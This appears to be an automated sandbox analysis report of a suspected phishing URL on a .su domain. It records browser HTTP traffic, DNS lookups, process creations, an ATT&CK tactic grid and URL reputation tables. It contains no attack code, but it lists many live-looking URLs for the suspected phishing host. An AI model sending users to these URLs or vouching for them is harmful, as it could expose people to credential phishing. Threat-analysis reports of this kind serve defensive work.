Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6KiBzp78P2oq/36bbhCnx2z3zB HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/67S3WMjHVWYUUT0/6C2eccLE3a HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6uvwhtyYID/2RkyVQrL8NsC HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6CtriZAVvTVfZo/24z5NeChfvx HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6KiBzp78P2oq/36bbhCnx2z3zB HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/67S3WMjHVWYUUT0/6C2eccLE3a HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6zszKQogk5hPX/5ksp3DD5a7cAYqnU HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6uvwhtyYID/2RkyVQrL8NsC HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6CtriZAVvTVfZo/24z5NeChfvx HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000825E607DC1 HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Jan 2024 14:34:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iTeNAWxr0xRfH76oRCPWcTrx8pz%2BGzVg5zwH1ZOx8WDMMbEFwG9k1nIyX5Umcm3QItD0YuV5KfQwVtyWm40Lz1IFnUGXUPi96PkPZ07LalbPfuAaacYKQlosUuASIQM1uqmt9850ctn4nBsdq6swudzUCxs9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84a8fea58d4f4583-ATLalt-svc: h3=":443"; ma=86400
Source: chromecache_51.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_51.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.50.93:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.50.93:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.159.126.152:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.159.126.152:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_4024_314630952Jump to behavior
Source: classification engineClassification label: sus22.phis.win@18/8@24/13
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2272,i,569364735770316750,3485990403573813858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2272,i,569364735770316750,3485990403573813858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/1zVUXHxamXrpmXhlHPnZeBElLS/0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6zszKQogk5hPX/5ksp3DD5a7cAYqnU0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6UzTmEVCN/7V7eH0UOOchUDO20%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/0eWLTvWEPE0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/0YnPUEkvNYKUHRxh0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6KiBzp78P2oq/36bbhCnx2z3zB0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6AmLV3UL1pt/8ufkTIk4Df0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6Jv3UEQZN3wq33YY/1sorWiW94sLFre70%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/67S3WMjHVWYUUT0/6C2eccLE3a0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6CtriZAVvTVfZo/24z5NeChfvx0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/favicon.ico0%Avira URL Cloudsafe
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6uvwhtyYID/2RkyVQrL8NsC0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
172.67.199.173
truefalse
    unknown
    jsdelivr.map.fastly.net
    151.101.1.229
    truefalse
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        accounts.google.com
        142.250.105.84
        truefalse
          high
          challenges.cloudflare.com
          104.17.2.184
          truefalse
            high
            www.google.com
            142.250.105.104
            truefalse
              high
              clients.l.google.com
              142.250.105.139
              truefalse
                high
                clients1.google.com
                unknown
                unknownfalse
                  high
                  clients2.google.com
                  unknown
                  unknownfalse
                    high
                    cdn.jsdelivr.net
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/84a8fe9b2b47507e/1706106840301/fdc164c912d01ac111ebb61588bbd64cfefffb90b726ec87368a6336ce872d90/dpaCGNz7ndiTzaLfalse
                        high
                        https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEtrue
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4false
                            high
                            https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                              high
                              https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/false
                                unknown
                                https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6zszKQogk5hPX/5ksp3DD5a7cAYqnUfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84a8fe9b2b47507efalse
                                  high
                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                    high
                                    https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/0YnPUEkvNYKUHRxhfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                      high
                                      https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6Jv3UEQZN3wq33YY/1sorWiW94sLFre7false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/67S3WMjHVWYUUT0/6C2eccLE3afalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000825E607DC1false
                                        high
                                        https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6AmLV3UL1pt/8ufkTIk4Dffalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/1zVUXHxamXrpmXhlHPnZeBElLS/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6UzTmEVCN/7V7eH0UOOchUDO2false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://a.nel.cloudflare.com/report/v3?s=iTeNAWxr0xRfH76oRCPWcTrx8pz%2BGzVg5zwH1ZOx8WDMMbEFwG9k1nIyX5Umcm3QItD0YuV5KfQwVtyWm40Lz1IFnUGXUPi96PkPZ07LalbPfuAaacYKQlosUuASIQM1uqmt9850ctn4nBsdq6swudzUCxs9false
                                          high
                                          https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6CtriZAVvTVfZo/24z5NeChfvxfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/6KiBzp78P2oq/36bbhCnx2z3zBfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/0eWLTvWEPEfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.cssfalse
                                            high
